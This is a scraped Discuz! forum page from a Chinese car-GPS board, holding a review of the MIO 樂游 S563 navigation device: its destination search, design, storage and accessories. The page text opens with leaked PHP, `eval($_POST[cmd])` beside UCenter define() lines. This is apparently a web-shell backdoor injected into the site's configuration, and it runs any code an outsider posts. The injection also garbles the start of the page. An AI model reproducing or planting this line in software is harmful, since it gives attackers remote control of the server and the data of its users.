');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 隨影而行旅遊寶典 4.7英吋樂游S563評測 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

隨影而行旅遊寶典 4.7英吋樂游S563評測

作為一款車載PND其實際作用主要體現在機體的導航能力,決定車載PND實際導航能力主要是依據機體內置地圖信息的豐富程度,此外目的地的搜索方式在一定程度上也決定了機體的實際操作性。在實際用中,用戶可能會經常遇到目的地信息不全的現象,比如知道要去的寫字樓或者飯店的名稱但具體門牌號不知道,或者知曉路名稱但不知道具體位置,往往會造成用戶無法設定導航目的地。MIO的全新產品樂游系列S563採用了全新的探索操作模式,上述現象迎刃而解,用戶通過輸入目的地的任何有效信息都會獲得準確的導航提示,令用戶做到自主導航。


    此款樂游S563可以算是MIO樂游系列的全新產品,該系列的開山之作S500相信大家不會陌生,我們針對了MIO樂游S500的探索式導航也相應作了實際體驗,詳情大家可以參考《車掌中活地圖 車載PNDA周邊設施應用解析》。此款MIO探索式全新產品S563已經送抵中關村在線,我們一起來感受一下MIO探索式導航的魅力所在。


   樂游S563從外形來看和前作S500差別不大,纖細超薄的外形和精湛的工藝得到了秉承。S563依舊標配了4.7英吋的高亮液晶觸摸屏,不但能滿足用戶日常導航的需要,對於普通影音娛樂也可以輕鬆應對。機身前面板延續樂游系列的鋼琴烤漆工藝,後殼體採用了流光銀的磨砂工藝,不但美觀大方並且具有相當不錯的手感,此外磨砂後殼體的防滑和耐磨程度都是普通膠身產品不可比擬的。開關按鍵的位於機體的頂部,各類擴展接口位於機身底部,擴展存儲方面S563支持體積更為小巧的TF存儲卡,結合機體內置的2GB存儲空間完全可以滿足用戶的日常需求。


  
S563機身正反特寫
  
開關按鍵和擴展存儲接口

一鍵回主菜單快捷鍵

行車狀態的樂游S563

此次送測的樂游S563

    樂游S563與普通車載PND不同的是,機體前面板還設置了快捷返回鍵,用戶無論對機體進行何等操作,輕觸按鍵就可以返回機體的主菜單,操作的易用性非傳統PND可比。配件方面,車充、數據線、光盤支架一應俱全,在此需要提醒大家一下,樂游S536隨機標配的數據線不但能夠方便PND與PC之間數據傳輸,而且還支持為本機電池充電。此外標配的車載安裝支架採用了加厚塑膠吸盤,穩定性的得到了加強。
返回列表